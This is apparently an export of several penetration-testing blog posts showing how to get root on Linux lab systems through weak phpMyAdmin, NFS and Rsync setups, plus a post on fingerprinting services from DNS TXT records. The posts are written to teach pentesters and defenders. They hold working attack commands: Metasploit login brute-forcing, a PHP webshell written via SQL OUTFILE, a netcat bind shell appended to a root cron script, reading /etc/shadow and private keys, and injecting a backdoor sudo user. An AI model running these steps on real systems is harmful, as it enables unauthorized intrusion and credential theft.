This blog will walk-through how to attack insecure phpMyAdmin configurations and world writable files to gain a root shell on a Linux system. This case study commonly makes appearances in CTFs, but the general approach for attacking phpMyAdmin can be applied to many web applications. This should be a fun walk-through for people new to penetration testing, or those looking for a phpMyAdmin attack refresher.

This is the third of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.

Below are links to the first two blogs in the series:

Below is an overview of what will be covered in this blog:

What is phpMyAdmin?

phpMyAdmin is a web application that can be used to manage local MySQL databases. It’s commonly found in environments of all sizes and occasionally accessible directly from the internet. It's often used as part of open source projects and as a result some administrators don't realize that it's been installed in their environment. Developers also use it to temporarily spin up/down basic test environments, and we commonly see those turn into permanently unmanaged installations on corporate networks. Since we see phpMyAdmin so often, we thought it would be worth sharing a basic overview of how to use it to get a foothold on a system.
To get started, let's talk about finding phpMyAdmin instances.

Accessing NATed Environments

At the risk of adding unnecessary complexity to this scenario, we're going to assume that all of our tests are being conducted from a system that's in a NATed environment, meaning we're pretending to connect to an SSH server that is exposed to the internet through a firewall, while the environment we're attacking is on the other side of the firewall.

Finding PHPMyAdmin

phpMyAdmin is a web application that’s usually hosted by Apache, but it can be hosted by other web servers.  Sometimes it’s installed in the web root directory,  but more commonly we see it installed off of the /phpMyAdmin path. For example, https://server/phpMyAdmin.

With this knowledge let's start searching for web servers that might be hosting phpMyAdmin instances using our favorite port scanner Nmap:

nmap -sT -sV -p80,443 192.168.1.0/24 -oA phpMyAdmin_scan

Next we can quickly search the phpMyAdmin_scan.gnmap output file for open ports with the command below:

grep -i "open" phpMyAdmin_scan.gnmap


We can see a few Apache instances. We can now target those to determine if phpMyAdmin is being hosted on the webroot or /phpMyAdmin path.

Since we are SSHing into a NATed environment we are going to forward port 80 through an SSH tunnel to access the web server hosted on 192.168.1.171. In most cases you won't have to do any port forwarding, but I thought it would be fun to cover the scenario. A detailed overview of SSH tunneling and SOCKS proxies is out of scope for this blog, but below is my attempt to illustrate what we're doing.


Below are a couple of options for SSH tunneling to the target web server.

Linux SSH Client

ssh pentest@ssh.servers.com -L 2222:192.168.1.171:80

Windows PuTTY Client
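If you're working from Windows, a command-line sketch using PuTTY's plink with the same host and ports would be:

plink.exe -ssh -L 2222:192.168.1.171:80 pentest@ssh.servers.com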

Once port forwarding is configured, we're able to access phpMyAdmin by navigating to http://127.0.0.1:2222/phpmyadmin in our local web browser.

Dictionary Attacks against PHPMyAdmin

Now that we've found a phpMyAdmin instance the next step is usually to test for default credentials, which are root:[blank].   For the sake of this lab we'll assume the default has been changed, but all is not lost.  From here we can conduct a basic dictionary attack to test for common user/password combinations without causing trouble.  However, you should always research the web application you're performing dictionary attacks against to ensure that you don't cause account lockouts.

There are a lot of great word lists out there, but for the sake of this scenario we kept it simple with the list below.

User List:

echo root >> /tmp/users.txt
echo admin >> /tmp/users.txt
echo user >> /tmp/users.txt

Password List:

echo password >> /tmp/passwords.txt
echo Password >> /tmp/passwords.txt

You can use a tool like Burp Intruder to conduct dictionary attacks against phpMyAdmin (and other web applications), but a nice article is already available on the topic here.  So to show an alternative we'll use Metasploit since it has a module built for the task.  Below are some commands to get you started.

Note: Metasploit is installed on the Kali Linux distribution by default.

msfconsole
use auxiliary/scanner/http/phpmyadmin_login
set rhosts 192.168.1.171
set USER_AS_PASS true
set targeturi /phpMyAdmin/index.php
set user_file /tmp/users.txt
set pass_file /tmp/passwords.txt
run

Below is a screenshot of what a successful dictionary attack looks like.


If the dictionary attack discovers valid credentials, you're ready to login and move onto the next step. Below is a short video showing the dictionary attack process using Metasploit.

Uploading WebShells through PHPMyAdmin

Now that we've guessed the password, the goal is to determine if there is any functionality that may allow us to execute operating system commands on the server.  MySQL supports user defined functions that could be used, but instead we're going to write a webshell to the webroot using the OUTFILE function.

Note: In most multi-tiered environments writing a webshell to the webroot through SQL injection wouldn't work, because the database and web server are not hosted on the same system. phpMyAdmin is a bit of an exception in that regard, but LAMP, WAMP, and XAMPP are other examples. It's also worth noting that in some environments the mysql service account may not have write access to the webroot or phpMyAdmin directories.

MySQL Code to Write a Webshell

To get started click the "SQL" button to view the query window.  Then execute the query below to upload the custom PHP webshell that can be used to execute commands on the operating system as the Apache service account. Remember that phpMyAdmin may not always be installed to /var/www/phpMyAdmin when executing this in real environments.

SELECT '<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><?php if($_GET["cmd"]) { system($_GET["cmd"]); } ?> </pre></BODY></HTML>'

INTO OUTFILE '/var/www/phpMyAdmin/cmd.php'

The actual code can be downloaded here, but below is a screenshot showing it in context.


The webshell should now be available at http://127.0.0.1:2222/phpMyAdmin/cmd.php. With that in hand we can start issuing OS commands and begin privilege escalation.
Below are a few commands to start with:

whoami
ls -al
ls /

Below is a quick video illustrating the process.

Note: When you're all done with your webshell make sure to remove it.  Also, consider adding authentication to your webshells so you're not opening up holes in client environments.

Locating World Writable Files

World-writable files and folders can be written to by any user.  They aren’t implicitly bad, but when those files are directly or indirectly executed by the root user they can be used to escalate privileges.

Finding World-Writable Files

Below is the command we'll run through our webshell to locate potentially exploitable world-writable directories.

find / -maxdepth 3 -type d -perm -777 2>/dev/null
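The find above targets directories; a similar sketch for locating world-writable files is:

# World-writable files (writable by "other"), three levels deep
find / -maxdepth 3 -type f -perm -o+w 2>/dev/null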

From here we can start exploring some of the affected files and looking for potentially exploitable targets.

Exploiting a World Writable Root Cron Job Script

In our example below, the /scripts/ directory is world-writable. It appears to contain a script that is run by a root cron job. While this isn't incredibly common, we have seen it in the wild. The general idea can be applied to sudo scripts as well. There are a lot of things we could write to the root cron job script, but for fun we are going to add a line to the script that will start a netcat listener as root. Then we can connect to the listener from our Linux system.

Display Directory Listing for Scripts

ls /scripts
cat /scripts/rootcron.sh

Add Netcat Backdoor to Root’s Crontab Script

echo "nc -l -p12345 -e /usr/bin/sh& 2>/dev/null" >> /scripts/rootcron.sh
cat /scripts/rootcron.sh

You'll have to wait for the cron job to trigger, but after that you should be able to connect to the netcat backdoor listening on port 12345 from the Linux system.

Below are a few commands you might want to try once connected:

nc 192.168.1.171 12345
whoami
pwd
cat /etc/shadow
w

I acknowledge that this seems like an exaggerated scenario, but sometimes reality is stranger than fiction. While this isn’t a common occurrence we have seen very similar scenarios during real penetration tests.  For scenarios that require a reverse shell instead of a bind shell, pentestmonkey.net has a few documented options here.   However, below is a quick video showing the netcat backdoor installation and access.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerable phpMyAdmin installation and a world writable script being executed by a root cron job. While there are many ways to reach the same end, I think the moral of this story is that web admin interfaces can be soft targets, and often support functionality that can lead to command execution. Also, performing web application discovery and maintenance is an important part of vulnerability management that is often overlooked. Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured web platforms like phpMyAdmin in their environments. Good luck and hack responsibly!

[post_title] => Linux Hacking Case Studies Part 3: phpMyAdmin [post_excerpt] => This blog will walkthrough how to attack insecure phpMyAdmin configurations and world writable files to gain a root shell on a Linux system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-3-phpmyadmin [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:59:03 [post_modified_gmt] => 2021-06-08 21:59:03 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11333 [menu_order] => 400 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [24] => WP_Post Object ( [ID] => 11309 [post_author] => 17 [post_date] => 2020-03-24 07:00:52 [post_date_gmt] => 2020-03-24 07:00:52 [post_content] =>

This blog will walk through how to attack insecure NFS exports and setuid configurations in order to gain a root shell on a Linux system. This should be a fun overview for people new to penetration testing, or those looking for an NFS refresher. This is the second of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests. The first blog focused on attacking Rsync and can be found here.

Below is an overview of what will be covered in this blog:

What is NFS and Why Should I Care?

Network File System (NFS) is a clear text protocol that is used to transfer files between systems. So what’s the problem? Insecurely configured NFS servers are found during our internal network penetration tests about half of the time. The weak configurations often provide unauthorized access to sensitive data and sometimes the means to obtain a shell on the system. As you might imagine, the access we get is largely dependent on the NFS configuration.

Remotely accessing directories shared through NFS exports requires two things: mount access and file access.

  1. Mount access can be restricted by hostname or IP in /etc/exports, but in many cases no restrictions are applied.  It's also worth noting that IP and hostnames are easy to impersonate (assuming you know what to impersonate).
  2. File access is made possible by configuring exports in /etc/exports and labeling them as readable/writable. File access is then restricted by the connecting user's UID, which can be spoofed.  However, it should be noted that there are some mitigating controls such as "root squashing", that can be enabled in /etc/exports to prevent access from a UID of 0 (root).

The Major Issue with NFS

If it’s possible to mount NFS exports, the UID can usually be manipulated on the client system to bypass file permissions configured on the directory being made available via the NFS export. Access could also be accidentally given if the UID on the file and the UID of the connecting user are the same.

Below is an overview of how unintended access can occur:

  1. On “Server 1” there is a user named “user1” with a UID of 1111.
  2. User1 creates a file named “secret” that is only accessible to themselves and root using a command like “chmod 600 secret”.
  3. A read/write NFS export is then created on Server1 with no IP restrictions that maps to the directory containing user1’s secret file.
  4. On a separate Linux Client System, there is a user named “user2” that also has a UID of 1111.   When user2 mounts the NFS export hosted by Server1, they can read the secret file, because their UID matches the UID of the secret file’s owner (user1 on server1).

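To make that concrete, below is a rough sketch of user2's side of the scenario, using the hypothetical names and UID from the list above:

# On the client: create a user whose UID matches the secret file's owner (1111)
useradd -u 1111 user2
mkdir /mnt/demo
mount -o vers=3 server1:/home /mnt/demo
# user2 can now read user1's "secret" file because the UIDs match
su user2 -c 'cat /mnt/demo/user1/secret'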

Finding NFS Servers

NFS listens on UDP/TCP ports 111 and 2049. Use common tools like nmap to identify open NFS ports.

nmap -sS -sU -pT:2049,111,U:2049,111 192.168.1.0/24 -oA nfs_scan
grep -i "open" nfs_scan.gnmap

Use common tools like nmap or rpcinfo to determine the versions of NFS currently supported. This may be important later. We want to force the use of version 3 or below so we can list and impersonate the UID of the file owners. If root squashing is enabled that may be a requirement for file access.

Enumerate supported NFS versions with Nmap:

nmap -sV -p111,2049 192.168.1.171

Enumerate supported NFS versions with rpcinfo:

apt-get install nfs-common
rpcinfo -p 192.168.1.171

Below is a short video that shows the NFS server discovery process.

Enumerating NFS Exports

Now we want to list the available NFS exports on the remote server using Metasploit or showmount.

Metasploit example:

root@kali:~# msfconsole
msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set rhosts 192.168.1.171
msf auxiliary(nfsmount) > run

Showmount example:

apt-get install nfs-common
showmount -e 192.168.1.171

Mounting NFS Exports

Now we want to mount the available NFS exports while running as root. Be sure to use the “-o vers=3” flag to ensure that you can view the UIDs of the file owners.  Below are some options for mounting the export.

mkdir demo
mount -o vers=3 192.168.1.171:/home demo
mount -o vers=3 192.168.1.222:/home demo -o nolock

or

mount -t nfs -o vers=3 192.168.1.171:/home demo

or

mount -t nfs4 -o proto=tcp,port=2049 192.168.1.171:/home demo

Viewing UIDs of NFS Exported Directories and Files

If you have full access to everything then root squashing may not be enabled. However, if you get access denied messages, then you’ll have to impersonate the UID of the file owner and remount the NFS export to get access (not covered in this blog).

List UIDs using mounted drive:

ls -an

List UIDs using nmap:

nmap --script=nfs-ls 192.168.1.171 -p 111

Searching for Passwords and Private Keys (User Access)

Alrighty, let's assume you were able to access the NFS export as root or another user. Now it's time to try to find passwords and keys to access the remote server. Private keys are typically found in /home/<user>/.ssh directories, but passwords are often all over the place.

Find files with “Password” in the name:

cd demo
find ./ -name "*password*"
cat ./test/password.txt

Find private keys in .ssh directories:

mount 192.168.1.222:/ demo2/
cd demo2
find ./ -name "id_rsa"
cat ./root/.ssh/id_rsa
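If a root private key is recovered like this, a quick follow-up sketch (assuming the key is authorized for root on the target) is:

# SSH clients refuse world-readable keys, so copy and lock down permissions first
cp ./root/.ssh/id_rsa /tmp/id_rsa && chmod 600 /tmp/id_rsa
ssh -i /tmp/id_rsa root@192.168.1.222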

Below is a short video showing the whole mounting and file searching process.

Targeting Setuid (Getting Root Access)

Now that we have an interactive shell as a least privilege user (test), there are lots of privilege escalation paths we could take, but let's focus on setuid binaries for this round. Binaries can be configured with the setuid flag, which allows users to execute them as the binary's owner. Similarly, binaries configured with the setgid flag allow users to execute the binary as the group associated with the file. This can be a good and bad thing for system administrators.

  • The Good news is that setuid binaries can be used to safely execute privileged commands such as passwd.
  • The Bad news is that setuid binaries can often be used for privilege escalation if they are owned by root and allow direct execution of arbitrary commands or indirect execution of arbitrary commands through plugins/modules.

Below are commands that can be used to search for setuid and setgid binaries.

Find Setuid Binaries

find / -perm -u=s -type f 2>/dev/null

Find Setgid Binaries

find / -perm -g=s -type f 2>/dev/null

Below is an example screenshot you might encounter during a pentest.


Once again, the goal is usually to get the binary to execute arbitrary code as root for you. In real world scenarios you'll likely have to do a little research or reversing of target setuid binaries in order to determine the best way to do that. In our case, the /home/test/exec binary allows us to directly execute OS commands as root. The source code for the example application can be found at https://github.com/nullbind/Other-Projects/blob/master/random/exec.c.

Below are the sample commands and a screenshot:

cd /home/test/
./exec
whoami

As you can see from the image above, it was possible to execute arbitrary commands as root without too much effort. Below is a video showing the whole setuid exploitation process in action.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerable NFS export and insecure setuid binary. While there are many ways to obtain the same end, I think the moral of the story is to make sure that all network share types are configured with least privilege to help prevent unauthorized access to data and systems. Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured NFS servers. Good luck and hack responsibly!

[post_title] => Linux Hacking Case Studies Part 2: NFS [post_excerpt] => This blog will walk through how to attack insecure NFS exports and setuid configurations in order to gain a root shell on a Linux system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-2-nfs [to_ping] => [pinged] => [post_modified] => 2022-04-01 14:23:33 [post_modified_gmt] => 2022-04-01 19:23:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11309 [menu_order] => 401 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [25] => WP_Post Object ( [ID] => 11299 [post_author] => 17 [post_date] => 2020-03-23 07:00:05 [post_date_gmt] => 2020-03-23 07:00:05 [post_content] =>

This blog will walk through how to attack insecure Rsync configurations in order to gain a root shell on a Linux system. This should be a fun walkthrough for people new to penetration testing, or those looking for a Rsync refresher. This will be the first of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during real network penetration tests.

Below is an overview of what will be covered in this blog:

What is RSYNC and Why Should I Care?

Rsync is a utility for transferring and synchronizing files between two servers (usually Linux).  It determines synchronization by checking file sizes and timestamps. So what's the problem?
Insecurely configured Rsync servers are found during our network penetration tests about a third of the time. The weak configurations often provide unauthorized access to sensitive data, and sometimes the means to obtain a shell on the system. As you might imagine, the access we get is largely dependent on the Rsync configuration.

Remotely accessing directories shared through Rsync requires two things: file share access and file permissions.

  1. File Share Access can be defined in /etc/Rsyncd.conf to provide anonymous or authenticated access.
  2. File Permissions can also be defined in /etc/Rsyncd.conf by defining the user that the Rsync service will run as. If Rsync is configured to run as root, then anyone allowed to connect can access the shared files with the privileges of the root user.

Below is an example of Rsyncd.conf file that allows anonymous root access to the entire file system:

motd file = /etc/Rsyncd.motd
lock file = /var/run/Rsync.lock
log file = /var/log/Rsyncd.log
pid file = /var/run/Rsyncd.pid

[files]
path = /
comment = Remote file share.
uid = 0
gid = 0
read only = no
list = yes

Finding RSYNC Servers

By default, the Rsync service listens on port 873. It’s often found configured without authentication or IP restrictions. You can discover Rsync services using tools like nmap.

nmap -sS -sV -p873 192.168.1.0/24 -oA Rsync_scan
grep -i "open" Rsync_scan.gnmap

Enumerating RSYNC Shares

Below are commands that can be used to list the available directories and files.

List directory

rsync 192.168.1.171::

List sub directory contents

rsync 192.168.1.171::files

List directories and files recursively

rsync -r 192.168.1.171::files/tmp/

Downloading Files via RSYNC

Below are commands that can be used to download the identified files via Rsync.  This makes it easy to pull down files containing passwords and sensitive data.

Download files

rsync 192.168.1.171::files/home/test/mypassword.txt .

Download folders

rsync -r 192.168.1.171::files/home/test/ .

Uploading Files via RSYNC

Below are commands that can be used to upload files using Rsync.  This can be handy for dropping scripts and binaries into folder locations where they will be automatically executed.

Upload files

rsync ./myfile.txt 192.168.1.171::files/home/test

Upload folders

rsync -r ./myfolder 192.168.1.171::files/home/test

Creating a New User through Rsync

If Rsync is configured to run as root and is anonymously accessible, it’s possible to create a new privileged Linux user by modifying the shadow, passwd, group, and sudoers files directly.

Note: The same general approach can be used for any vulnerability that provides full write access to the OS. A few other examples include NFS exports and uploading web shells running as root.

Creating the Home Directory
Let’s start by creating our new user’s home directory.

# Create local work directories
mkdir demo
mkdir backup
cd demo

# Create new user’s home directory
mkdir ./myuser
rsync -r ./myuser 192.168.1.171::files/home

Create the Shadow File Entry
The /etc/shadow file is the Linux password file that contains user information such as home directories and encrypted passwords. It is only accessible by root.

To inject a new user entry via Rsync you’ll have to:

  1. Generate a password.
  2. Create the line to inject.
  3. Download /etc/shadow. (and backup)
  4. Append the new user to the end of /etc/shadow
  5. Upload / Overwrite the existing /etc/shadow

Note: Make sure to create a new user that doesn’t already exist on the system. ;)

Create Encrypted Password:

openssl passwd -crypt password123

Add New User Entry to /etc/shadow:

rsync -R 192.168.1.171::files/etc/shadow .
cp ./etc/shadow ../backup
echo "myuser:MjHKz4C0Z0VCI:17861:0:99999:7:::" >> ./etc/shadow
rsync ./etc/shadow 192.168.1.171::files/etc/

Create Passwd File Entry
The /etc/passwd file is used to keep track of registered users that have access to the system. It does not contain encrypted passwords. It can be read by all users.

To inject a new user entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/passwd. (and back it up so you can restore state later)
  3. Append the new user entry to the end of passwd.
  4. Upload / Overwrite the existing /etc/passwd

Note: Feel free to change the uid, but make sure it matches the value set in the /etc/group file. :) In this case the UID/GID are 1021.

Add New User Entry to /etc/passwd:

rsync -R 192.168.1.171::files/etc/passwd .
cp ./etc/passwd ../backup
echo "myuser:x:1021:1021::/home/myuser:/bin/bash" >> ./etc/passwd
rsync ./etc/passwd 192.168.1.171::files/etc/

Create the Group File Entry
The /etc/group file is used to keep track of registered group information on the system. It does not contain encrypted passwords. It can be read by all users.

To inject a new user entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/group. (and backup, just in case)
  3. Append the new user entry to the end of group.
  4. Upload / Overwrite the existing /etc/group file.

Note: Feel free to change the uid, but make sure it matches the value set in the /etc/passwd file. :) In this case the UID/GID are 1021.

Add New User Entry to /etc/group:

rsync -R 192.168.1.171::files/etc/group .
cp ./etc/group ../backup
echo "myuser:x:1021:" >> ./etc/group
rsync ./etc/group 192.168.1.171::files/etc/

Create Sudoers File Entry
The /etc/sudoers file contains a list of users that are allowed to run commands as root using the sudo command. It can only be read by root. We are going to modify it to allow the new user to execute any command through sudo.

To inject a entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/sudoers. (and backup, just in case)
  3. Append the new user entry to the end of sudoers.
  4. Upload / Overwrite the existing /etc/sudoers file.

Add New User Entry to /etc/sudoers:

rsync -R 192.168.1.171::files/etc/sudoers .
cp ./etc/sudoers ../backup
echo "myuser ALL=(ALL) NOPASSWD:ALL" >> ./etc/sudoers   
rsync ./etc/sudoers 192.168.1.171::files/etc/

Now you can simply log into the server via SSH using your newly created user and sudo sh to root!
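Putting it all together, a final sketch using the lab values from this walkthrough:

# Log in as the injected user (password123 from the shadow entry above) and escalate
ssh myuser@192.168.1.171
sudo sh
id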

Attacking Rsync Demo Video

Below is a video created in a lab environment that shows the process of identifying and exploiting an insecurely configured Rsync server to gain a root shell. While it may seem too simple to be true, it is based on configurations exploited during real penetration tests.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerability that provided write access.  While there are many ways to obtain the same end, I think the moral of the story is to make sure that all network share types are configured with least privilege to help prevent unauthorized access to data and systems.   Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured Rsync servers.  Good luck and hack responsibly!

The next blog in the series focuses on NFS and setuid binaries; it can be found here.

References

[post_title] => Linux Hacking Case Studies Part 1: Rsync [post_excerpt] => This blog will walk through how to attack insecure Rsync configurations in order to gain a root shell on a Linux system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-1-rsync [to_ping] => [pinged] => [post_modified] => 2022-04-04 10:01:30 [post_modified_gmt] => 2022-04-04 15:01:30 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11299 [menu_order] => 403 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [26] => WP_Post Object ( [ID] => 17444 [post_author] => 53 [post_date] => 2020-02-23 15:37:45 [post_date_gmt] => 2020-02-23 15:37:45 [post_content] =>

Learn about one of the open source projects from the NetSPI toolbox called PowerUpSQL. PowerUpSQL can be used to blindly inventory SQL Servers, audit them for common security misconfigurations, and exploit identified vulnerabilities during pentests and red teams operations. PowerUpSQL is an open source tool available on GitHub, learn more at https://powerupsql.com/.

For more open source projects from NetSPI check out https://github.com/netspi.

https://youtu.be/7sT1OQEtXlg
[post_title] => Attacking Modern Environments through SQL Server with PowerUpSQL [post_excerpt] => Learn about one of the open source projects from the NetSPI toolbox called PowerUpSQL. PowerUpSQL can be used to blindly inventory SQL Servers, audit them for common security misconfigurations, and exploit identified vulnerabilities during pentests and red teams operations. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-modern-environments-through-sql-server-with-powerupsql [to_ping] => [pinged] => [post_modified] => 2022-11-11 12:16:55 [post_modified_gmt] => 2022-11-11 18:16:55 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=17444 [menu_order] => 72 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [27] => WP_Post Object ( [ID] => 11219 [post_author] => 17 [post_date] => 2019-11-18 07:00:30 [post_date_gmt] => 2019-11-18 07:00:30 [post_content] => DNS reconnaissance is an important part of most external network penetration tests and red team operations. Within DNS reconnaissance there are many areas of focus, but I thought it would be fun to dig into DNS TXT records that were created to verify domain ownership. They’re pretty common and can reveal useful information about the technologies and services being used by the target company. In this blog I’ll walkthrough how domain validation typically works, review the results of my mini DNS research project, and share a PowerShell script that can be used to fingerprint online service providers via DNS TXT records. This should be useful to red teams and internal security teams looking for ways to reduce their internet facing footprint. Below is an overview of the content if you want to skip ahead:

Domain Ownership Validation Process

When companies or individuals want to use an online service that is tied to one of their domains, the ownership of that domain needs to be verified.  Depending on the service provider, the process is commonly referred to as “domain validation” or “domain verification”. Below is an outline of how that process typically works:
  1. The company creates an account with the online service provider.
  2. The company provides the online service provider with the domain name that needs to be verified.
  3. The online service provider sends an email containing a unique domain validation token (text value) to the company’s registered contact for the domain.
  4. The company then creates a DNS TXT record for their domain containing the domain validation token they received via email from the online service provider.
  5. The online service provider validates domain ownership by performing a DNS query to verify that the TXT record containing the domain validation token has been created.
  6. In most cases, once the domain validation process is complete, the company can remove the DNS TXT record containing the domain validation token.
It's really that last step that everyone seems to forget to do, and that's why simple DNS queries can be so useful for gaining insight into what online service providers companies are using. Note: The domain validation process doesn't always require a DNS TXT entry. Some online service providers simply request that you upload a text file containing the domain validation token to the webroot of the domain's website. For example, https://mywebsite.com/validation_12345.txt. Google dorking can be a handy way to find those instances if you know what you're looking for, but for now let's stay focused on DNS records.
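If you just want to eyeball a single domain's TXT records manually first, a quick sketch with dig looks like this (example.com is a placeholder):

# List all TXT records, including any leftover domain validation tokens
dig +short TXT example.com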

Analyzing TXT Records for a Million Domains

Our team has been gleaning information about online service providers from DNS TXT records for years,  but I wanted a broader understanding of what was out there.  So began my journey to identify some domain validation token trends.

Choosing a Domain Sample

I started by simply grabbing DNS TXT records for the Alexa top 1 million sites. I used a slightly older list, but for those looking to mine that information on a recurring basis, Amazon has a service you can use at https://aws.amazon.com/alexa-top-sites/.

Tools for Querying TXT Records

DNS TXT records can be easily viewed with tools like nslookup, host, dig, massdns, or security focused tools like dnsrecon .  I ended up using a basic PowerShell script to make all of the DNS requests, because PowerShell lets me be lazy. 😊  It was a bit slow, but it still took less than a day to collect all of the TXT records from 1 million sites. Below is the basic collection script I used.
# Import list of domains
$Domains = gc c:\temp\domains.txt

# Get TXT records for domains
$txtlist = $Domains |
ForEach-Object{
    Resolve-DnsName -Type TXT $_ -Verbose
}

# Filter out most spf records
$Results = $txtlist  | where type -like txt |  select name,type,strings | 
ForEach-Object {
    $myname = $_.name
    $_.strings | 
    foreach {
        
        $object = New-Object psobject
        $object | add-member noteproperty name $myname
        $object | add-member noteproperty txtstring $_
        if($_ -notlike "v=spf*")
        {
            $object
        }
    }
} | Sort-Object name

# Save results to CSV
$Results | Export-Csv -NoTypeInformation dnstxt-records.csv

# Return results to console
$Results

Quick and Dirty Analysis of Records

Below is the high level process I used after the information was collected:
  1. Removed remaining SPF records
  2. Parsed key value pairs
  3. Sorted and grouped similar keys
  4. Identified the service providers through Google dorking and documentation review
  5. Removed keys that were completely unique and couldn’t be easily attributed to a specific service provider
  6. Categorized the service providers
  7. Identified most commonly used service provider categories based on domain validation token counts
  8. Identified most commonly used service providers based on domain validation token counts

Top 5 Service Provider Categories

After briefly analyzing the DNS TXT records for approximately 1 million domains, I’ve created a list of the most common online service categories and providers that require domain validation. Below are the top 5 categories:
 PLACE CATEGORY
1 Cloud Service Providers with full suites of online services like Google, Microsoft, Facebook, and Amazon seemed to dominate the top of the list.
2 Certificate Authorities like globalsign were a close second.
3 Electronic Document Signing like Adobe sign and Docusign hang around third place.
4 Collaboration Solutions like Webex, Citrix, and Atlassian services seem to sit around fourth place collectively.
5 Email Marketing and Website Analytics providers like Pardot and Salesforce seemed to dominate the ranks as well, no surprise there.
There are many other types of services that range from caching services like Cloudflare to security services like "Have I Been Pwned", but the categories above seem to be the most ubiquitous. It's also worth noting that I removed SPF records, because technically they are not domain validation tokens. However, SPF records are another rich source of information that could potentially lead to email spoofing opportunities if they aren't managed well. Either way, they were out of scope for this blog.

Top 25 Service Providers

Below are the top 25 service providers I was able to fingerprint based on their domain validation token (TXT record).  However, in total I was able to provide attribution for around 130.
COUNT | PROVIDER | CATEGORY | EXAMPLE TOKEN
149785 | gmail.com | Cloud Services | google-site-verification=ZZYRwyiI6QKg0jVwmdIha68vuiZlNtfAJ90msPo1i7E
70797 | Microsoft Office 365 | Cloud Services | ms=hash
16028 | facebook.com | Cloud Services | facebook-domain-verification=zyzferd0kpm04en8wn4jnu4ooen5ct
11486 | globalsign.com | Certificate Authority | _globalsign-domain-verification=Zv6aPQO0CFgBxwOk23uUOkmdLjhc9qmcz-UnQcgXkA
5097 | Adobe Enterprise Services | Electronic Signing, Cloud Services | adobe-idp-site-verification=ffe3ccbe-f64a-44c5-80d7-b010605a3bc4
4093 | Amazon Simple Email | Cloud Services | amazonses:ZW5WU+BVqrNaP9NU2+qhUvKLdAYOkxWRuTJDksWHJi4=
3605 | globalsign.com | Certificate Authority | globalsign-domain-verification=zPlXAjrsmovNlSOCXQ7Wn0HgmO--GxX7laTgCizBTW
3486 | Atlassian services | Collaboration | atlassian-domain-verification=Z8oUd5brL6/RGUMCkxs4U0P/RyhpiNJEIVx9HXJLr3uqEQ1eDmTnj1eq1ObCgY1i
2700 | mailru | Cloud Services | mailru-verification: fa868a61bb236ae5
2698 | yandex.com | Cloud Services | yandex-verification=fb9a7e8303137b4c
2429 | Pardot (Salesforce) | Marketing and Analytics | pardot_104652_*=b9b92faaea08bdf6d7d89da132ba50aaff6a4b055647ce7fdccaf95833d12c17
2098 | docusign.com | Electronic Signing | docusign=ff4d259b-5b2b-4dc7-84e5-34dc2c13e83e
1468 | Webex | Collaboration | webexdomainverification.P7KF=bf9d7a4f-41e4-4fa3-9ccb-d26f307e6be4
1358 | www.sendinblue.com | Marketing and Analytics | Sendinblue-code:faab5d512036749b0f69d906db2a7824
1005 | zoho.com | Email | zoho-verification=zb[sequentialnumber].zmverify.zoho.[com|in]
690 | dropbox.com | Collaboration | dropbox-domain-verification=zsp1beovavgv
675 | webex.com | Collaboration | ciscocidomainverification=f1d51662d07e32cdf508fe2103f9060ac5ba2f9efeaa79274003d12d0a9a745
607 | Spiceworks.com | Security | workplace-domain-verification=BEJd6oynFk3ED6u0W4uAGMguAVnPKY
590 | haveibeenpwned.com | Security | have-i-been-pwned-verification=faf85761f15dc53feff4e2f71ca32510
577 | citrix.com | Collaboration | citrix-verification-code=ed1a7948-6f0d-4830-9014-d22f188c3bab
441 | brave.com | Collaboration | brave-ledger-verification=fb42f0147b2264aa781f664eef7d51a1be9196011a205a2ce100dc76ab9de39f
427 | Adobe Sign / Document Cloud | Electronic Signing | adobe-sign-verification=fe9cdca76cd809222e1acae2866ae896
384 | Firebase (Google) | Development and Publishing | firebase=solar-virtue-511
384 | O365 | Cloud Services | mscid=veniWolTd6miqdmIAwHTER4ZDHPBmT0mDwordEu6ABR7Dy2SH8TjniQ7e2O+Bv5+svcY7vJ+ZdSYG9aCOu8GYQ==
381 | loader.io | Security | loaderio=fefa7eab8eb4a9235df87456251d8a48

Automating Domain Validation Token Fingerprinting

To streamline the process a little bit I've written a PowerShell function called "Resolve-DnsDomainValidationToken". You can simply provide it with domains and it will scan the associated DNS TXT records for known service providers based on the library of domain validation tokens I created. Currently it supports parameters for a single domain, a list of domains, or a list of URLs. Resolve-DnsDomainValidationToken can be downloaded from the NetSPI PowerShell repository on GitHub.

Command Example

To give you an idea of what the commands and output look like I've provided an example below.  The target domain was randomly selected from the Alexa 1 Million list.
